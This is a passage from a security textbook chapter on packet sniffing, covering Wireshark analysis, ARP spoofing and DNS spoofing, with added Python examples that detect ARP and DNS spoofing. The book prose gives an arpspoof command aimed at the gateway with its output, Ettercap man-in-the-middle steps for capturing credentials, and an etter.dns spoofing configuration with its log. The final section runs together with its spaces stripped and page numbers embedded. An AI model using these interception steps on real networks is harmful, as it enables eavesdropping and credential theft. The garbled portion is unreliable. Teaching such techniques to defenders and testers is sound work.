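                      ttl, proto, 0, IPv4Address(src).packed, IPv4Address(dst).packed)
    return hdr[:10] + struct.pack("!H", checksum(hdr)) + hdr[12:]


def build_frame(src: str, dst: str, proto: int, sport: int, dport: int,
                payload: bytes = b"", corrupt: bool = False) -> bytes:
    """Build an Ethernet/IPv4/{UDP,TCP} frame. corrupt=True mimics a frame captured
    before the NIC's checksum offload filled the checksum in (a constructed case)."""
    if proto == UDP:
        seg = struct.pack("!HHHH", sport, dport, 8 + len(payload), 0) + payload
    else:  # minimal TCP header: data offset 5, SYN flag, window 29200
        seg = struct.pack("!HHIIHHHH", sport, dport, 674275431, 0, (5 << 12) | 0x02, 29200, 0, 0) + payload
    csum = transport_checksum(IPv4Address(src).packed, IPv4Address(dst).packed, proto, seg)
    if corrupt:
        csum ^= 0x5A5A
    off = 6 if proto == UDP else 16
    seg = seg[:off] + struct.pack("!H", csum) + seg[off + 2:]
    return ETH_HDR + build_ipv4(src, dst, proto, seg) + seg


def parse_frame(frame: bytes) -> dict:
    """Decode the fields tcpdump prints by default plus the -vv checksum verdict."""
    ethertype = struct.unpack("!H", frame[12:14])[0]
    if ethertype != 0x0800:
        return {"ethertype": ethertype}
    ip = frame[14:]
    ver_ihl, _, total_len, _, _, ttl, proto, _, src, dst = struct.unpack("!BBHHHBBH4s4s", ip[:20])
    ihl = (ver_ihl & 0x0F) * 4
    seg = ip[ihl:total_len]
    pkt = {"ethertype": ethertype, "ttl": ttl, "proto": proto,
           "src": str(IPv4Address(src)), "dst": str(IPv4Address(dst)),
           "ip_header_ok": checksum(ip[:ihl]) == 0}  # a header with a valid checksum sums to zero
    if proto in (UDP, TCP):
        pkt["sport"], pkt["dport"] = struct.unpack("!HH", seg[:4])
        off = 6 if proto == UDP else 16
        stored = struct.unpack("!H", seg[off:off + 2])[0]
        expected = transport_checksum(src, dst, proto, seg)
        # RFC 768: a computed zero is sent as 0xFFFF; a stored zero means "no checksum" (UDP only)
        pkt["sum_ok"] = stored == expected or (expected == 0 and stored == 0xFFFF) or (proto == UDP and stored == 0)
        pkt["sum_stored"], pkt["sum_expected"] = stored, expected
        if proto == TCP:
            pkt["seq"], pkt["ack"], flags = struct.unpack("!IIH", seg[4:14])
            pkt["flags"] = flags & 0x1FF
    return pkt


def matches_tcp_and_host(pkt: dict, host: str) -> bool:
    """BPF `tcp and host H`: H may be the source OR the destination address."""
    return pkt.get("proto") == TCP and host in (pkt.get("src"), pkt.get("dst"))


def sample_frames() -> list:
    """Constructed traffic modelled loosely on the book's captures: a DNS query whose checksum
    offload had not run yet, its reply, an HTTP SYN to the gateway, a SYN from the gateway,
    and a connection to a different host that the filter must drop."""
    query = b"\x00\x2a\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00"  # constructed DNS header stub
    return [
        build_frame("192.168.86.57", "192.168.86.1", UDP, 45867, 53, query, corrupt=True),
        build_frame("192.168.86.1", "192.168.86.57", UDP, 53, 45867, query),
        build_frame("192.168.86.57", "192.168.86.1", TCP, 43790, 80),
        build_frame("192.168.86.1", "192.168.86.57", TCP, 80, 43790),
        build_frame("192.168.86.57", "192.168.86.22", TCP, 50000, 8001),
    ]


def capture_filter(frames: list, host: str) -> list:
    """Keep only the frames that pass `tcp and host <host>`, as a capture filter would."""
    return [p for p in map(parse_frame, frames) if matches_tcp_and_host(p, host)]


if __name__ == "__main__":
    for p in map(parse_frame, sample_frames()):
        verdict = "sum ok" if p["sum_ok"] else f"bad cksum 0x{p['sum_stored']:04x} -> 0x{p['sum_expected']:04x}!"
        print(f"{p['src']}.{p['sport']} > {p['dst']}.{p['dport']} proto {p['proto']} [{verdict}]")
    print(len(capture_filter(sample_frames(), "192.168.86.1")), "frames pass `tcp and host 192.168.86.1`")
```

Two points worth noticing when running it: the filter keeps both the SYN to 192.168.86.1 and the SYN coming back from it, because `host` is direction-agnostic (use `src host` or `dst host` to pick one direction), and only the corrupted datagram fails verification, which is the same verdict tcpdump reaches when it prints `bad udp cksum 0x2dcd -> 0x690e!` with the stored and the recomputed value.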
Packet Analysis

Ultimately, packet analysis is probably a big part of why you are capturing the packets to begin with. Once you have the packets, you will want to take a closer look at them, including filtering, following communication streams, and maybe even looking at the statistics and other visualizations from the packet capture. This is another area where Wireshark really excels and can help you a lot. As noted earlier, Wireshark really understands protocols, which means it not only can decode the protocol, it can also tell you places where there may be protocol violations. There are a number of other places where Wireshark can make reading through a packet capture significantly easier.

Wireshark is good at determining information that isn't directly provided. It will color frames where it identifies problems in the frame list based on rule sets. These rule sets may be changed and added to. The default rules color frames with errors to have black backgrounds with red text. Once you open the packet in the window below the frame list, you can get the details about the error. Anywhere you see square brackets, [], in Wireshark, you are looking at data provided by Wireshark that it has calculated or inferred from the messages it has received. As an example, Figure 9.7 shows the details of a frame where there were errors. You'll see places where Wireshark provides information in square brackets to help you out.

FIGURE 9.7 Packet analysis

Wireshark will take care of calculations that will make life easier for you. When a TCP connection starts up, sequence numbers are generated, and to prevent spoofing TCP connections, the initial sequence number should be random. A sequence number is 4 bytes, so they are large numbers. Sequence numbers increment based on the number of bytes that are transmitted. If you were to try to do this addition yourself, you would be spending some time tracking sequence numbers and acknowledgment numbers. Instead, to make it easier, Wireshark provides you with a relative sequence number. The first sequence number is 1 according to Wireshark. The relative sequence number then increments as you would normally expect. Figure 9.8 shows the TCP headers with a relative sequence number.

FIGURE 9.8 Relative sequence numbers

Packets (or frames) that belong to a particular conversation can be spread through a packet capture. You may find it difficult to move from one packet in the conversation to another, especially if there are a lot of frames that pass by in between. Wireshark allows you to follow a stream. This can be done from a context menu that comes up when you right-click a frame that belongs to the conversation. If you select Follow TCP Stream, for example, Wireshark will create a display filter for you, only showing the frames that belong to that conversation. In addition, Wireshark will extract the data from the payload, presenting it to you. With an HTTP conversation, for example, you will see the text of the HTTP messages between the client and the server. Figure 9.9 shows the dialog box that comes up showing the text of an HTTP conversation. The client messages are colored with a pink background and red text, while the server messages are in blue with a lilac or light purple background. At the bottom, you will see it says Save And Show Data As and ASCII is selected. There are other options, including raw, C arrays, and YAML.

Wireshark also has substantial capabilities to present statistics from the packet capture. There is a Statistics menu that has a lot of options. One of them is Protocol Hierarchy. This shows every protocol identified in the capture in a hierarchy based on how the protocols are related. For example, as shown in Figure 9.10, everything is a frame, and all of these frames are Ethernet. Out of all of the Ethernet frames, everything in this particular capture is an IP packet. From there, 5.5 percent are UDP datagrams. SSDP, MDNS, and DNS are all protocols that make use of UDP as a Transport layer protocol. The majority of the packets captured are TCP segments. Most of those are SSL, though in reality they are all TLS, which is the successor protocol to SSL.

FIGURE 9.9 Follow TCP Stream dialog box

Another entry in the Statistics menu to look at is the Conversations view. This shows all the conversations between endpoints in the packet capture. Every layer of the capture has different sets of conversations, since layer 2 conversations are different than IP address conversations. Any IP conversation that passes out of the local network has a layer 2 conversation with the local gateway. This means you may likely have fewer Ethernet conversations than you do IP conversations. Additionally, your TCP conversations will be different from your IP conversations. You may have multiple sets of ports between two IP addresses. This may be especially true if your local browser sets up multiple connections to a web server to issue requests for images, HTML pages, and other resources that go into the rendering of a page. Figure 9.11 shows the Conversations statistics from a packet capture.

FIGURE 9.10 Protocol Hierarchy statistics

FIGURE 9.11 Conversations statistics

One last feature to look at is in the Analyze menu. Wireshark does perform analysis on frames and packets as it gets them. We looked at some of these earlier by looking at the list of frames and looking at colors. Additionally, when we looked at the protocol decode, you could see errors in cases where the information identified by Wireshark is in square brackets. You don't have to skim all the way through the packet capture file to find the errors one at a time. Instead, if you go to the Analyze menu, you can select Expert Information, and this will show you all of the frames that Wireshark has identified as problematic. In Figure 9.12, you can see all of the expert information by category. You see the errors, warnings, notes, and chat. If you were to open each of these entries, you would get a list of frames. Clicking one of these entries takes you to that frame in the capture so you can see its details.

FIGURE 9.12 Expert Information

One element of packet capture that we haven't spent any time on is the timestamp. Packets don't contain timestamps, so just looking at most frames or packets won't give you the time the frame passed through the network. When you look at the time column in Wireshark, you will find a relative time. This is relative to the start of the capture. That may not be very useful to you. Helpfully, packet capture files will include the time of the start of the capture in the metadata. This means you can change the time shown in Wireshark to be absolute time. This assumes the time and the time zone in the capturing file were correct, since it does rely on the configuration of the capturing system.

Spoofing Attacks

You may not have to be stuck with only capturing packets that are destined to your system or ones that you can get to you by reconfiguring the switch. There are other ways to get messages to you. This can be done by using different types of spoofing attacks. A spoofing attack is where you pretend to be a system you aren't. You can approach this from different layers, starting at layer 2. You can also spoof at a higher layer, using DNS to get systems to send traffic to systems you want.

Spoofing attacks allow you to sit in the middle of a conversation between two endpoints. This brings up an issue you need to keep in mind. If you are running spoofing attacks, it means at least one end of the conversation is potentially not getting to the appropriate endpoint. If everything doesn't look right, someone is going to start suspecting something. This means you need to make sure you are doing something to make the conversation whole. If someone gets suspicious that something is wrong, they may start looking for causes, which may mean you could be identified. Presumably, if you are running a spoofing attack, you don't want to be identified and caught. As always, you need to make sure you are using these powers for good and not for evil.

ARP Spoofing

The Address Resolution Protocol (ARP) has two stages. The first is the request, where a system knows an IP address but doesn't know the corresponding MAC address. It sends an ARP request asking for the system with the IP address to respond with its MAC address. The response is the system replying, indicating its MAC address to the requestor. There is nothing to authenticate that request, though. In theory, anyone could respond to that request with their MAC address to get the requesting system to send the message to the attacker's/spoofer's address. We could make it even easier by simply not waiting for the request to begin with and just sending the reply.

ARP Poisoning

You may also hear the term ARP poisoning, which means the same thing as ARP spoofing. You are poisoning the ARP cache on target systems with bad entries.
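The following program is an added example, not code from the book or from any of the tools it names. It is the monitoring side of what this section and the Spoofing Detection section later describe: an arpwatch-style detector that decodes raw Ethernet/ARP frames, keeps the IP-to-MAC table a network monitor would learn, and raises an alert on the signs of ARP spoofing, namely a reply nobody asked for (gratuitous ARP), a reply addressed to the broadcast MAC rather than to the asker, and a known IP address suddenly claimed by a different MAC. All frames, IP addresses and MACs in it are constructed; the helper that builds frames exists only to feed the detector in this example.

```python
"""Added example, not from the book: an arpwatch-style ARP spoofing detector.
It parses raw Ethernet/ARP frames, learns the IP-to-MAC table and records alerts for
unsolicited replies, replies sent to the broadcast MAC, and changed bindings.
All frames, addresses and MACs below are constructed for the example."""
import struct
from collections import Counter
from ipaddress import IPv4Address
from typing import Optional

ETHERTYPE_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2
BROADCAST = "ff:ff:ff:ff:ff:ff"


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def mac_bytes(text: str) -> bytes:
    return bytes.fromhex(text.replace(":", ""))


def build_arp(op: int, sender_mac: str, sender_ip: str, target_mac: str, target_ip: str,
              eth_dst: Optional[str] = None) -> bytes:
    """Build an Ethernet + ARP (IPv4 over Ethernet) frame for the test traffic below.
    Requests go to broadcast; replies go to the target unless eth_dst overrides it."""
    if eth_dst is None:
        eth_dst = BROADCAST if op == ARP_REQUEST else target_mac
    arp = struct.pack("!HHBBH6s4s6s4s", 1, 0x0800, 6, 4, op,
                      mac_bytes(sender_mac), IPv4Address(sender_ip).packed,
                      mac_bytes(target_mac), IPv4Address(target_ip).packed)
    return mac_bytes(eth_dst) + mac_bytes(sender_mac) + struct.pack("!H", ETHERTYPE_ARP) + arp


def parse_arp(frame: bytes) -> Optional[dict]:
    """Return the ARP fields of a frame, or None if the frame is not ARP."""
    eth_dst, eth_src, ethertype = struct.unpack("!6s6sH", frame[:14])
    if ethertype != ETHERTYPE_ARP:
        return None
    _, _, _, _, op, smac, sip, tmac, tip = struct.unpack("!HHBBH6s4s6s4s", frame[14:42])
    return {"op": op, "eth_dst": mac_str(eth_dst), "eth_src": mac_str(eth_src),
            "sender_mac": mac_str(smac), "sender_ip": str(IPv4Address(sip)),
            "target_mac": mac_str(tmac), "target_ip": str(IPv4Address(tip))}


class ArpWatch:
    """Learns IP->MAC bindings from ARP traffic and records alerts for suspicious replies."""

    def __init__(self):
        self.table = {}          # ip -> mac, as learned from the wire
        self.pending = set()     # (asker_ip, asked_ip) requests not yet answered
        self.alerts = []
        self.unsolicited_by_mac = Counter()

    def observe(self, frame: bytes) -> None:
        arp = parse_arp(frame)
        if arp is None:
            return
        if arp["op"] == ARP_REQUEST:
            self.pending.add((arp["sender_ip"], arp["target_ip"]))
            self._learn(arp)
            return
        if arp["op"] != ARP_REPLY:
            return
        reasons = []
        answered = (arp["target_ip"], arp["sender_ip"])
        if answered in self.pending:
            self.pending.discard(answered)
        else:
            reasons.append("unsolicited")        # gratuitous ARP: nobody asked for this binding
            self.unsolicited_by_mac[arp["sender_mac"]] += 1
        if arp["eth_dst"] == BROADCAST:
            reasons.append("broadcast")          # a genuine reply is unicast back to the asker
        known = self.table.get(arp["sender_ip"])
        if known is not None and known != arp["sender_mac"]:
            reasons.append("mapping-changed")    # this IP was bound to another MAC a moment ago
        if reasons:
            self.alerts.append({"ip": arp["sender_ip"], "old_mac": known,
                                "new_mac": arp["sender_mac"], "reasons": reasons})
        self._learn(arp)

    def _learn(self, arp: dict) -> None:
        self.table[arp["sender_ip"]] = arp["sender_mac"]

    def suspects(self) -> list:
        """MACs ranked by unsolicited replies sent; a spoofer resends every few seconds."""
        return self.unsolicited_by_mac.most_common()


def sample_frames() -> list:
    """Constructed sequence: a normal request/reply for the gateway, then two broadcast
    replies from a different MAC claiming the gateway's address."""
    gw, client, other = "02:00:00:00:00:01", "02:00:00:00:00:57", "02:00:00:00:00:ee"
    return [
        build_arp(ARP_REQUEST, client, "192.168.86.57", "00:00:00:00:00:00", "192.168.86.1"),
        build_arp(ARP_REPLY, gw, "192.168.86.1", client, "192.168.86.57"),
        build_arp(ARP_REPLY, other, "192.168.86.1", client, "192.168.86.57", eth_dst=BROADCAST),
        build_arp(ARP_REPLY, other, "192.168.86.1", client, "192.168.86.57", eth_dst=BROADCAST),
    ]


def run_detector(frames: list) -> ArpWatch:
    watch = ArpWatch()
    for frame in frames:
        watch.observe(frame)
    return watch


if __name__ == "__main__":
    w = run_detector(sample_frames())
    for a in w.alerts:
        print(f"ALERT {a['ip']}: {a['old_mac']} -> {a['new_mac']} ({', '.join(a['reasons'])})")
    print("suspects:", w.suspects())
```

The first alert carries all three reasons because the binding for 192.168.86.1 changes at the moment the unsolicited broadcast reply arrives; the second carries only two, since the table already holds the new MAC. A "mapping-changed" alert on its own is not proof of an attack (a replaced network card or a DHCP reassignment looks the same), which is why the detector also counts unsolicited replies per MAC: the steady stream of gratuitous replies needed to keep the caches poisoned is what separates a spoofer from a one-off change. Any MAC it reports can then be located through the switch's MAC-to-port table as the Spoofing Detection section describes.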
To be efficient, systems will take any ARP responses, even if they didn't ask, and cache the mapping. This keeps them from having to ask for the MAC address should they ever need it. This is a feature we can take advantage of. We could just send out ARP responses, mapping whatever IP address on the network we want to our MAC address. This would get all systems on the local network sending messages to us, as our address is in their ARP cache. The process of just sending out ARP responses without a corresponding ARP request is called gratuitous ARP, meaning it's an ARP message that wasn't asked for.

One of the problems we have is the length of time ARP entries are cached for. On Linux systems, the default cache length is 60 seconds. You can check it from an entry in the /proc pseudo filesystem, as you can see in the following code listing. You could also change the behavior by replacing the 60 with another value. On Windows systems, the cache time is different. Microsoft opted to follow RFC 4861, which applies to IPv6, for the IPv4 implementation. Starting with Windows Vista, Microsoft has a base time of 30,000 milliseconds, which is multiplied by a random value between .5 and 1.5 to get the cache duration. This means it's different from one system to another and also from one boot to another.

ARP Cache Duration on Linux

cat /proc/sys/net/ipv4/neigh/default/gc_stale_time
60

Because the cache can time out quickly, we have to keep sending out our gratuitous ARP responses. Obviously, this is something better done programmatically rather than manually. This is especially true since there is another problem. When we redirect messages to our system, we really need to forward them back out onto the network with the correct MAC address in the destination field. Otherwise, conversations don't happen. A TCP connection never completes because the SYN or the SYN/ACK never reaches the appropriate destination system. Instead, it is sent to our system where it dead-ends unless we do something. This requires turning on forwarding so the message we are hijacking can be forwarded back out the same interface to get to its intended destination.

There are a few programs that can be used to handle ARP spoofing. One of them, arpspoof, has been around for a long time now. It was written by Dug Song, who also wrote a program called fragroute, which is useful in its own way. Using arpspoof, we can inject ourselves in between two systems on the network. We can tell arpspoof which two IP addresses we want to pretend to be. It takes care of the rest for us. In the following code listing, you can see a run of arpspoof where I've selected the default gateway on my network to be the one I spoof. This means I get messages that are destined for the default gateway, so anything that's going off-net gets sent to the system running arpspoof. You'll see the gratuitous ARP responses being sent. They get sent out every few seconds to ensure that no ARP cache entries age out.

Using arpspoof

[email protected]:~$ sudo arpspoof -i eth0 -c both 192.168.86.1
0:1c:42:38:62:8e ff:ff:ff:ff:ff:ff 0806 42: arp reply 192.168.86.1 is-at 0:1c:42:38:62:8e
0:1c:42:38:62:8e ff:ff:ff:ff:ff:ff 0806 42: arp reply 192.168.86.1 is-at 0:1c:42:38:62:8e
0:1c:42:38:62:8e ff:ff:ff:ff:ff:ff 0806 42: arp reply 192.168.86.1 is-at 0:1c:42:38:62:8e
0:1c:42:38:62:8e ff:ff:ff:ff:ff:ff 0806 42: arp reply 192.168.86.1 is-at 0:1c:42:38:62:8e
0:1c:42:38:62:8e ff:ff:ff:ff:ff:ff 0806 42: arp reply 192.168.86.1 is-at 0:1c:42:38:62:8e
0:1c:42:38:62:8e ff:ff:ff:ff:ff:ff 0806 42: arp reply 192.168.86.1 is-at 0:1c:42:38:62:8e
0:1c:42:38:62:8e ff:ff:ff:ff:ff:ff 0806 42: arp reply 192.168.86.1 is-at 0:1c:42:38:62:8e
0:1c:42:38:62:8e ff:ff:ff:ff:ff:ff 0806 42: arp reply 192.168.86.1 is-at 0:1c:42:38:62:8e
^C
Cleaning up and re-arping targets...

Instead of selecting a pair of hosts to sit between, I've essentially said I want to sit between the entire network and the default gateway. The problem with this approach is that only one side of the conversation will arrive at this system—the side that is destined for the default gateway. The response from outside the network won't show up at the system where arpspoof is running. This could be fixed by adding -t with a target IP address and then -r to indicate that reverse connections should be collected as well. Then, both of the systems specified would be spoofed to go to the system where arpspoof is running.

Another tool we could use for ARP spoofing, which has multiple uses in fact, is Ettercap. Ettercap has two modes. One is a console-based mode. The other is a GUI-based mode. When you run Ettercap, you have to indicate which mode you want it to run in. In GUI mode, you can more easily select which hosts you want to target. Ettercap is a sniffer that can also run man-in-the-middle (MitM) attacks. When you run an ARP spoof attack, you need to know IP address to MAC address mappings, and you need to get Ettercap to check for hosts on the network. The first thing to do is to tell Ettercap you are going to do a Unified sniff if there is only one interface on the system Ettercap is running on, or a Bridged sniff if there are multiple interfaces. Once that's done, other menus show up. Once it runs a scan of all the hosts, you can bring up a host list. You can see the host list in Ettercap in Figure 9.13.

Once the host list is in place, you can select the hosts you want to target. Since ultimately we're talking about conversations, you can have two targets to place hosts into. This refers to two ends of the conversation. Let's say you wanted to listen to a conversation between two hosts on your network, like a client system and a local domain controller, so as to potentially grab credentials. You would put one of the systems in Target 1 and the other into Target 2.

FIGURE 9.13 Ettercap host list

Once the targets are selected, you can select ARP Spoof from the MitM menu, which is not shown here. There are other options in that menu, which you can see in Figure 9.14. This time, we're going to just select ARP Spoof. That selection will bring up a dialog box asking if we want to sniff remote connections and also if we want to spoof one way. Make selections there and the spoofing starts.

Once the spoofing has started, you can do whatever you like with the traffic that is suddenly coming into your system. You can check easily enough to make sure the traffic is arriving by just capturing packets. What you see here are some packets going between 192.168.86.55 and 192.168.86.1. Neither of these IP addresses belongs to the system where Wireshark (and Ettercap) is running. This means the attack is working correctly. Rather than selecting a pair of targets, I selected only a single target. By default, with one target in Target 1 and nothing else explicitly selected, every other system on the network is in Target 2.

Once you are done capturing traffic off the network, you need to remember to stop the attack. Your tool may seed the network with the correct mappings, though in time the bad ARP cache entries will just time out. As noted earlier, on Linux systems, that would be within a minute. On Windows systems, it's even less. It's not absolutely required to restore the network to normal, but it would be polite to do so. You may cause issues on the network if you don't. It wouldn't be serious, but any disruption could end up causing issues.

FIGURE 9.14 RSA keys preferences

DNS Spoofing

Another way to capture traffic is to use a technique called DNS spoofing. This is more targeted than an ARP spoof, however. ARP spoofing casts a very wide net, looking to capture every message being sent. With DNS spoofing, we aren't looking to capture traffic necessarily, in the sense of grabbing an existing conversation. Instead, we are looking to get a target to come to systems under our control for specific requests. We do this by intercepting DNS requests and providing responses to the requestor. Instead of providing legitimate responses, we're going to be using our own addresses. When one of our targets tries to visit a website that we are interested in getting information from, we redirect them to an IP address where we have our own website set up.

This is something we can use Ettercap for again. It is especially useful because it makes it so much easier to capture the DNS request. Unless we can capture the traffic somewhere, it's hard to make sure we are getting the DNS request so we can know how and when to respond to it. Unlike with ARP, we can't just send a spurious response to a system and have it cache the address. This is not to say that DNS information isn't cached. Just as with ARP, systems want to be as efficient as possible. DNS requests are time-consuming, so operating systems don't want to make them unless they are necessary. Where possible, operating systems will cache DNS mappings from hostname to IP address. That means we poison the cache once and have the system continue to send requests to the wrong address for potentially days.
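The following program is an added example, not code from the book or from Ettercap. It takes the defender's view of the race this section describes: a sniffer on the client's segment records every DNS query by (client address, client port, transaction ID), pairs each response with the query it answers, and raises a strong alert when one transaction receives two responses whose answers disagree, which is exactly what a spoofed reply followed by the legitimate one looks like. It also raises the weaker alert of a response arriving from an address other than the server that was asked; the Spoofing Detection section later explains why that one can be a false alarm. It includes its own minimal DNS encoder and decoder (header, question, A-record answers with name compression) so it runs offline; every message and address in it is constructed.

```python
"""Added example, not from the book: a resolver-side monitor for the DNS spoofing race.
It parses DNS over UDP (header, question, A-record answers), pairs each response with the
query it answers, and flags a transaction that receives two responses with different
answers, plus the weaker signal of a response from an address other than the server asked.
Every message and address below is constructed for the example."""
import struct
from ipaddress import IPv4Address


def encode_name(name: str) -> bytes:
    return b"".join(bytes([len(p)]) + p.encode() for p in name.rstrip(".").split(".")) + b"\x00"


def decode_name(msg: bytes, off: int):
    """Decode a (possibly compressed) name; returns (name, offset just past it)."""
    labels, end = [], None
    while True:
        length = msg[off]
        if length & 0xC0 == 0xC0:                      # compression pointer (RFC 1035 4.1.4)
            end = end if end is not None else off + 2
            off = struct.unpack("!H", msg[off:off + 2])[0] & 0x3FFF
            continue
        off += 1
        if length == 0:
            break
        labels.append(msg[off:off + length].decode())
        off += length
    return ".".join(labels), (end if end is not None else off)


def build_query(txid: int, qname: str) -> bytes:
    return struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0) + encode_name(qname) + struct.pack("!HH", 1, 1)


def build_response(txid: int, qname: str, addresses: list, ttl: int = 300) -> bytes:
    msg = struct.pack("!HHHHHH", txid, 0x8180, 1, len(addresses), 0, 0)
    msg += encode_name(qname) + struct.pack("!HH", 1, 1)
    for addr in addresses:  # answer NAME is a pointer (0xC00C) back to the question at offset 12
        msg += struct.pack("!HHHIH", 0xC00C, 1, 1, ttl, 4) + IPv4Address(addr).packed
    return msg


def parse_dns(msg: bytes) -> dict:
    txid, flags, _, ancount, _, _ = struct.unpack("!HHHHHH", msg[:12])
    qname, off = decode_name(msg, 12)
    off += 4                                            # skip QTYPE and QCLASS
    answers = []
    for _ in range(ancount):
        _, off = decode_name(msg, off)
        rtype, _, _, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        if rtype == 1 and rdlen == 4:
            answers.append(str(IPv4Address(msg[off:off + 4])))
        off += rdlen
    return {"txid": txid, "is_response": bool(flags & 0x8000), "qname": qname, "answers": answers}


class DnsSpoofMonitor:
    """Tracks (client, port, txid) transactions seen on the wire and records alerts."""

    def __init__(self):
        self.outstanding = {}   # (client_ip, client_port, txid) -> {"server", "qname", "first"}
        self.alerts = []

    def observe(self, src_ip: str, src_port: int, dst_ip: str, dst_port: int, payload: bytes) -> None:
        dns = parse_dns(payload)
        if not dns["is_response"]:
            self.outstanding[(src_ip, src_port, dns["txid"])] = {"server": dst_ip, "qname": dns["qname"], "first": None}
            return
        tx = self.outstanding.get((dst_ip, dst_port, dns["txid"]))
        if tx is None or tx["qname"] != dns["qname"]:
            self.alerts.append({"reason": "response-without-matching-query", "qname": dns["qname"], "from": src_ip})
            return
        if src_ip != tx["server"]:   # weak signal: some servers legitimately answer from another address
            self.alerts.append({"reason": "unexpected-source", "qname": dns["qname"], "from": src_ip, "asked": tx["server"]})
        if tx["first"] is None:
            tx["first"] = {"from": src_ip, "answers": dns["answers"]}   # the client will use this one
        elif set(dns["answers"]) != set(tx["first"]["answers"]):        # strong signal: two answers disagree
            self.alerts.append({"reason": "conflicting-answers", "qname": dns["qname"],
                                "used": tx["first"], "later": {"from": src_ip, "answers": dns["answers"]}})


def sample_exchange() -> list:
    """(src_ip, src_port, dst_ip, dst_port, payload) tuples as a sniffer on the client's segment
    would see them. Transaction 1: a reply from a local host beats the real server's reply.
    Transaction 2: an honest reply from a different address than the one that was asked."""
    client, server, local_host = "192.168.86.55", "192.168.86.1", "192.168.86.57"
    return [
        (client, 40000, server, 53, build_query(0x1234, "www.foo.com")),
        (local_host, 53, client, 40000, build_response(0x1234, "www.foo.com", [local_host])),
        (server, 53, client, 40000, build_response(0x1234, "www.foo.com", ["198.51.100.10"])),
        (client, 40001, server, 53, build_query(0x5678, "www.wubble.com")),
        ("192.168.86.2", 53, client, 40001, build_response(0x5678, "www.wubble.com", ["198.51.100.20"])),
    ]


def run_monitor(exchange: list) -> list:
    mon = DnsSpoofMonitor()
    for pkt in exchange:
        mon.observe(*pkt)
    return mon.alerts


if __name__ == "__main__":
    for alert in run_monitor(sample_exchange()):
        print(alert)
```

The "conflicting-answers" alert is the one to act on: it records which answer the client actually used (the first to arrive) and which arrived too late, so the poisoned mapping can be flushed from the client's cache before the TTL lets it linger. A forged source address on the spoofed reply would defeat the "unexpected-source" check but not this one, because the legitimate server's answer still shows up and still disagrees. The second transaction shows the false-alarm case the text warns about: one honest answer from an address other than the one asked, with no conflict.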
395EttercaprequiresaconfigurationfileinwhichyousetuptheDNSrecordsyouwanttospoof.ItwilllookjustlikeaDNSzonefile,whereyouprovidetherecordname,therecordtype,andwhatitmapsto.Inthefollowingcodelisting,youcanseeasampleoftheDNSconfigurationfile.Inthiscase,thehostnameswww.foo.comandwww.wubble.comarebothmappedtothesameIPaddress.AtthatsingleIPaddress,sincethesearewebsitehostnames,thereshouldbeawebserverthatiscapableofservingrequestsforthosehostnames.Additionally,thereisamappingforamailexchangerrecord.Thiscouldbeusedifyouwanttointerceptemailtothedomainindicatedintheconfigurationfile.ThelocationofthefileintheLinuxdistributionI’mworkingfromis/etc/ettercap/etter.dns.Thereareanumberofentriesalreadyinplacethere.DNSConfigurationfor Ettercap##Samplehostsfilefordns_spoofplugin#www.foo.comA192.168.86.57www.wubble.comA192.168.86.57mail.foo.comA192.168.86.57foo.comMX###192.168.86.57OnceDNSisinplace,weneedtogobacktosetupEttercaptointercepttraffic.Thisisthesameprocesswedidbefore.WeneedtosnifftrafficsoEttercapcanseetherequestscomein.WealsoneedtouseanARPspoofattacktogettrafficonthenetworktooursystemsowecanseetheDNSrequests.OnceyougettothestageofstartinganARPspoof,youcangotothePluginsmenuandselectManagePlugins.Fromthere,youcanenabletheDNSspoofplug-­in.Thiswillautomaticallyloadtheetter.dnsfilethatwaseditedearlier.Incaseit’snotapparent,theseattackswillworkonlyonthelocalnetworkbecausetheaddressingisbyMACaddress.Thisrequiresphysicalnetworkconnectivityfortheinterfacebeingusedtorunthespoofing.Inthefollowinglisting,youwillseethelogthatiswrittenoutinEttercapfromanyrequestthathasbeencaptured.Whiletheentriesintheprecedingcodelistingwereadded,noneofthedefaultentriesinthefilewereremoved.Microsoft’swebsiteisoneofthehostnamesthatisbeingredirected.Inthatcase,it’snotbeingredirectedtooneofourlocalsystemsbutinsteadtoanothersystemontheInternet 
altogether.SinceweareusingDNShere,thehostdoesn’thavetobeonthelocalnetwork.DNSwillrespondwithanIPaddress,andtherequestingsystemwillattempttomakeaconnectiontothatIPaddress.Theonlyreasonweneedlocalaccessistocapturetherequests.Oncetherequestshavebeencapturedandrespondedto,everythingislayer3andabove.396 Chapter9  Sniffing■EttercapDNSSpoofLogENDL3ERROR:246bytepacket(0800:06)destinedto192.168.86.26wasnotSforwarded(libnet_write_raw_ipv4():-­1byteswritten(Networkisunreachable))SENDL3ERROR:48bytepacket(0800:11)destinedto192.168.86.26wasnotforwarded(libnet_write_raw_ipv4():-­1byteswritten(Networkisunreachable))SENDL3ERROR:83bytepacket(0800:06)destinedto192.168.86.26wasnotforwarded(libnet_write_raw_ipv4():-­1byteswritten(Networkisunreachable))SENDL3ERROR:52bytepacket(0800:06)destinedto192.168.86.26wasnotforwarded(libnet_write_raw_ipv4():-­1byteswritten(Networkisunreachable))SENDL3ERROR:52bytepacket(0800:06)destinedto192.168.86.26wasnotforwarded(libnet_write_raw_ipv4():-­1byteswritten(Networkisunreachable))SENDL3ERROR:48bytepacket(0800:11)destinedto192.168.86.26wasnotforwarded(libnet_write_raw_ipv4():-­1byteswritten(Networkisunreachable))SENDL3ERROR:48bytepacket(0800:11)destinedto192.168.86.26wasnotforwarded(libnet_write_raw_ipv4():-­1byteswritten(Networkisunreachable))SENDL3ERROR:48bytepacket(0800:11)destinedto192.168.86.26wasnotforwarded(libnet_write_raw_ipv4():-­1byteswritten(Networkisunreachable))SENDL3ERROR:52bytepacket(0800:06)destinedto192.168.86.26wasnotforwarded(libnet_write_raw_ipv4():-­1byteswritten(Networkisunreachable))SENDL3ERROR:245bytepacket(0800:06)destinedto192.168.86.26wasnotforwarded(libnet_write_raw_ipv4():-­1byteswritten(Networkisunreachable))DHCP:[192.168.86.1]ACK:192.168.86.43255.255.255.0GW192.168.86.1DNS192.168.86.1"lan"dns_spoof:A[browser.pipe.aria.microsoft.com]spoofedto[107.170.40.56]Thereasonthisworks,eventhoughtheDNSrequestdoesgoouttothelegitimateDNSserveranditresponds,isbecauseDNSisUDP,sothereisnoconnectiontobemade.AUDP-­basedrequestgoesout,andaUD
